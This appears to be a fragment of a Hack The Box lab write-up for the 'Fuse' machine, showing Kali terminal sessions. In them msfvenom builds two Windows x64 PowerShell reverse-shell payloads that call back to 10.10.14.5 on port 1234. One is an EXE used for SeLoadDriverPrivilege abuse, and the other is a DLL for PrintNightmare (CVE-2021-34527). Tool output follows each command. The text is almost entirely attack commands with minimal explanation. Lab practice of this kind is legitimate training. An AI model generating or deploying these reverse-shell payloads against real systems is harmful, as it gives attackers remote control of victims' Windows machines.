msfvenom
┌──(kali㉿kali)-[~/…/labs/fuse/SeLoadDriverPrivilege]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f exe -o pe.exe
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
payload size: 1867 bytes
final size of exe file: 8192 bytes
saved as: pe.exe
msfvenom generated a reverse shell executable
DLL Payload
┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2021-34527]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f dll -o printnightmare.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1867 bytes
Final size of dll file: 8704 bytes
Saved as: printnightmare.dll
msfvenom generated a reverse shell executable in the DLL format